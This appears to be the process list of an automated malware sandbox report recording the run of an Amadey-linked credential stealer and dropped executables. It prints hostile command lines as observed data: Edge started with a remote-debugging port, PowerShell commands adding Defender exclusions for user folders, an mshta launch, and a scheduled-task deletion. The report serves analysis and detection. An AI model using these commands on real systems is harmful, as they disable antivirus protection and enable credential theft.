                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    Target ID:14
                                                                                                                                                                                                                                                    Start time:09:42:45
                                                                                                                                                                                                                                                    Start date:31/12/2024
                                                                                                                                                                                                                                                    Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                    Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory=""
                                                                                                                                                                                                                                                    Imagebase:0x7ff740fe0000
                                                                                                                                                                                                                                                    File size:4'210'216 bytes
                                                                                                                                                                                                                                                    MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    Target ID:15
                                                                                                                                                                                                                                                    Start time:09:42:46
                                                                                                                                                                                                                                                    Start date:31/12/2024
                                                                                                                                                                                                                                                    Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                    Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2312 --field-trial-handle=2148,i,10048407555887453736,9436864136807657335,262144 /prefetch:3
                                                                                                                                                                                                                                                    Imagebase:0x7ff740fe0000
                                                                                                                                                                                                                                                    File size:4'210'216 bytes
                                                                                                                                                                                                                                                    MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    Target ID:16
                                                                                                                                                                                                                                                    Start time:09:42:46
                                                                                                                                                                                                                                                    Start date:31/12/2024
                                                                                                                                                                                                                                                    Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                    Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
                                                                                                                                                                                                                                                    Imagebase:0x7ff740fe0000
                                                                                                                                                                                                                                                    File size:4'210'216 bytes
                                                                                                                                                                                                                                                    MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    Target ID:17
                                                                                                                                                                                                                                                    Start time:09:42:46
                                                                                                                                                                                                                                                    Start date:31/12/2024
                                                                                                                                                                                                                                                    Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                    Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2324 --field-trial-handle=2008,i,2217384488025341277,266429373537081613,262144 /prefetch:3
                                                                                                                                                                                                                                                    Imagebase:0x7ff740fe0000
                                                                                                                                                                                                                                                    File size:4'210'216 bytes
                                                                                                                                                                                                                                                    MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    Target ID:18
                                                                                                                                                                                                                                                    Start time:09:43:00
                                                                                                                                                                                                                                                    Start date:31/12/2024
                                                                                                                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                    Commandline:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                    Imagebase:0xf50000
                                                                                                                                                                                                                                                    File size:3'220'480 bytes
                                                                                                                                                                                                                                                    MD5 hash:69E09CBF7B56454D9FF5686CD8FE492F
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                                                                    Target ID:19
                                                                                                                                                                                                                                                    Start time:09:43:10
                                                                                                                                                                                                                                                    Start date:31/12/2024
                                                                                                                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                    Commandline:"C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exe"
                                                                                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                                                                                    File size:93'696 bytes
                                                                                                                                                                                                                                                    MD5 hash:C821E7D7DAC978E7D5E8F35B0FE2AF88
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                                                                                    • Rule: JoeSecurity_Babadeda, Description: Yara detected Babadeda, Source: C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exe, Author: Joe Security
                                                                                                                                                                                                                                                    Antivirus matches:
                                                                                                                                                                                                                                                    • Detection: 57%, ReversingLabs
                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    Target ID:20
                                                                                                                                                                                                                                                    Start time:09:43:10
                                                                                                                                                                                                                                                    Start date:31/12/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                    Imagebase:0x7ff68cce0000
                                                                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    Target ID:21
                                                                                                                                                                                                                                                    Start time:09:43:10
                                                                                                                                                                                                                                                    Start date:31/12/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                    Commandline:"C:\Windows\sysnative\cmd" /c "C:\Users\user\AppData\Local\Temp\C0C9.tmp\C0CA.tmp\C0CB.bat C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exe"
                                                                                                                                                                                                                                                    Imagebase:0x7ff7ac430000
                                                                                                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    Target ID:22
                                                                                                                                                                                                                                                    Start time:09:43:10
                                                                                                                                                                                                                                                    Start date:31/12/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                    Commandline:"C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exe" any_word
                                                                                                                                                                                                                                                    Imagebase:0x7ff7ac430000
                                                                                                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    Target ID:23
                                                                                                                                                                                                                                                    Start time:09:43:10
                                                                                                                                                                                                                                                    Start date:31/12/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                    Imagebase:0x7ff68cce0000
                                                                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    Target ID:24
                                                                                                                                                                                                                                                    Start time:09:43:10
                                                                                                                                                                                                                                                    Start date:31/12/2024
                                                                                                                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                    Commandline:C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exe any_word
                                                                                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                                                                                    File size:93'696 bytes
                                                                                                                                                                                                                                                    MD5 hash:C821E7D7DAC978E7D5E8F35B0FE2AF88
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    Target ID:25
                                                                                                                                                                                                                                                    Start time:09:43:10
                                                                                                                                                                                                                                                    Start date:31/12/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                    Commandline:"C:\Windows\sysnative\cmd" /c "C:\Users\user\AppData\Local\Temp\C1B3.tmp\C1B4.tmp\C1B5.bat C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exe any_word"
                                                                                                                                                                                                                                                    Imagebase:0x7ff7ac430000
                                                                                                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    Target ID:26
                                                                                                                                                                                                                                                    Start time:09:43:11
                                                                                                                                                                                                                                                    Start date:31/12/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                    Commandline:"C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\Documents\HJEHIJEBKE.exe"
                                                                                                                                                                                                                                                    Imagebase:0xc30000
                                                                                                                                                                                                                                                    File size:236'544 bytes
                                                                                                                                                                                                                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    Target ID:27
                                                                                                                                                                                                                                                    Start time:09:43:11
                                                                                                                                                                                                                                                    Start date:31/12/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                    Imagebase:0x7ff68cce0000
                                                                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Has exited:true

Target ID:28
Start time:09:43:11
Start date:31/12/2024
Path:C:\Users\user\Documents\HJEHIJEBKE.exe
Wow64 process (32bit):true
Commandline:"C:\Users\user\Documents\HJEHIJEBKE.exe"
Imagebase:0x6c0000
File size:3'220'480 bytes
MD5 hash:69E09CBF7B56454D9FF5686CD8FE492F
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 0000001C.00000002.2272143312.00000000006C1000.00000040.00000001.01000000.00000010.sdmp, Author: Joe Security
Has exited:true

Target ID:29
Start time:09:43:13
Start date:31/12/2024
Path:C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exe
Wow64 process (32bit):true
Commandline:"C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exe"
Imagebase:0xc30000
File size:15'360 bytes
MD5 hash:9BE5AC720DCF1838FD5A2D7352672F66
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Antivirus matches:
• Detection: 30%, ReversingLabs
Has exited:true

Target ID:30
Start time:09:43:13
Start date:31/12/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff68cce0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:31
Start time:09:43:15
Start date:31/12/2024
Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):true
Commandline:"powershell.exe" -NoProfile -Command Add-MpPreference -ExclusionPath 'C:\wOXcVegx'
Imagebase:0x1d0000
File size:433'152 bytes
MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:32
Start time:09:43:15
Start date:31/12/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff68cce0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:34
Start time:09:43:18
Start date:31/12/2024
Path:C:\Users\user\AppData\Local\Temp\1027563001\64252d274d.exe
Wow64 process (32bit):true
Commandline:"C:\Users\user\AppData\Local\Temp\1027563001\64252d274d.exe"
Imagebase:0x9e0000
File size:540'672 bytes
MD5 hash:9AB250B0DC1D156E2D123D277EB4D132
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Antivirus matches:
• Detection: 95%, ReversingLabs
Has exited:true

Target ID:35
Start time:09:43:18
Start date:31/12/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff68cce0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:36
Start time:09:43:19
Start date:31/12/2024
Path:C:\Users\user\AppData\Local\Temp\1027563001\64252d274d.exe
Wow64 process (32bit):true
Commandline:"C:\Users\user\AppData\Local\Temp\1027563001\64252d274d.exe"
Imagebase:0x9e0000
File size:540'672 bytes
MD5 hash:9AB250B0DC1D156E2D123D277EB4D132
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000024.00000003.2395728481.0000000001508000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000024.00000003.2424648787.0000000001509000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000024.00000003.2389530571.0000000001504000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Has exited:true

Target ID:37
Start time:09:43:20
Start date:31/12/2024
Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):true
Commandline:"powershell.exe" -NoProfile -Command Add-MpPreference -ExclusionPath 'C:\Users'
Imagebase:0x1d0000
File size:433'152 bytes
MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

                                                                                                                                                                                                                                                    Target ID:38
                                                                                                                                                                                                                                                    Start time:09:43:20
                                                                                                                                                                                                                                                    Start date:31/12/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                    Imagebase:0x7ff68cce0000
                                                                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    Target ID:39
                                                                                                                                                                                                                                                    Start time:09:43:24
                                                                                                                                                                                                                                                    Start date:31/12/2024
                                                                                                                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                    Commandline:"C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exe"
                                                                                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                                                                                    File size:93'696 bytes
                                                                                                                                                                                                                                                    MD5 hash:C821E7D7DAC978E7D5E8F35B0FE2AF88
                                                                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    Target ID:40
                                                                                                                                                                                                                                                    Start time:09:43:24
                                                                                                                                                                                                                                                    Start date:31/12/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                    Imagebase:0x7ff68cce0000
                                                                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    Target ID:41
                                                                                                                                                                                                                                                    Start time:09:43:24
                                                                                                                                                                                                                                                    Start date:31/12/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                    Commandline:"C:\Windows\sysnative\cmd" /c "C:\Users\user\AppData\Local\Temp\F7C7.tmp\F7C8.tmp\F7C9.bat C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exe"
                                                                                                                                                                                                                                                    Imagebase:0x7ff7ac430000
                                                                                                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    Target ID:42
                                                                                                                                                                                                                                                    Start time:09:43:24
                                                                                                                                                                                                                                                    Start date:31/12/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                    Commandline:"C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exe" any_word
                                                                                                                                                                                                                                                    Imagebase:0x7ff7ac430000
                                                                                                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    Target ID:43
                                                                                                                                                                                                                                                    Start time:09:43:24
                                                                                                                                                                                                                                                    Start date:31/12/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                    Imagebase:0x7ff68cce0000
                                                                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    Target ID:44
                                                                                                                                                                                                                                                    Start time:09:43:24
                                                                                                                                                                                                                                                    Start date:31/12/2024
                                                                                                                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                    Commandline:C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exe any_word
                                                                                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                                                                                    File size:93'696 bytes
                                                                                                                                                                                                                                                    MD5 hash:C821E7D7DAC978E7D5E8F35B0FE2AF88
                                                                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    Target ID:45
                                                                                                                                                                                                                                                    Start time:09:43:24
                                                                                                                                                                                                                                                    Start date:31/12/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                    Commandline:"C:\Windows\sysnative\cmd" /c "C:\Users\user\AppData\Local\Temp\F9BB.tmp\F9BC.tmp\F9BD.bat C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exe any_word"
                                                                                                                                                                                                                                                    Imagebase:0x7ff7ac430000
                                                                                                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Has exited:true

Target ID:46
Start time:09:43:24
Start date:31/12/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
Imagebase:0x7ff7ac430000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true

Target ID:47
Start time:09:43:24
Start date:31/12/2024
Path:C:\Users\user\AppData\Local\Temp\1027564001\696689ce6d.exe
Wow64 process (32bit):true
Commandline:"C:\Users\user\AppData\Local\Temp\1027564001\696689ce6d.exe"
Imagebase:0xd10000
File size:2'668'544 bytes
MD5 hash:87330F1877C33A5A6203C49075223B16
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000002F.00000003.4825063904.00000000009F1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000002F.00000003.4847583445.00000000009A1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000002F.00000003.4847052772.00000000009FB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000002F.00000003.4847277082.000000000098A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000002F.00000003.4822742633.00000000009F1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000002F.00000003.4859195796.000000000098C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000002F.00000003.4793714186.00000000009EE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000002F.00000003.4809448660.00000000009E6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000002F.00000003.4839076597.00000000009F1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:
• Detection: 48%, ReversingLabs
Has exited:false

Target ID:48
Start time:09:43:24
Start date:31/12/2024
Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):false
Commandline:powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
Imagebase:0x7ff6eb350000
File size:452'608 bytes
MD5 hash:04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true

Target ID:49
Start time:09:43:28
Start date:31/12/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
Imagebase:0x7ff7ac430000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true

Target ID:50
Start time:09:43:28
Start date:31/12/2024
Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):false
Commandline:powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
Imagebase:0x7ff6eb350000
File size:452'608 bytes
MD5 hash:04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true

Target ID:51
Start time:09:43:30
Start date:31/12/2024
Path:C:\Windows\System32\mshta.exe
Wow64 process (32bit):false
Commandline:mshta "C:\Temp\.hta"
Imagebase:0x7ff7b3970000
File size:14'848 bytes
MD5 hash:0B4340ED812DC82CE636C00FA5C9BEF2
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true

Target ID:52
Start time:09:43:30
Start date:31/12/2024
Path:C:\Windows\System32\schtasks.exe
Wow64 process (32bit):false
Commandline:schtasks /delete /tn "AutoRunHTA" /f
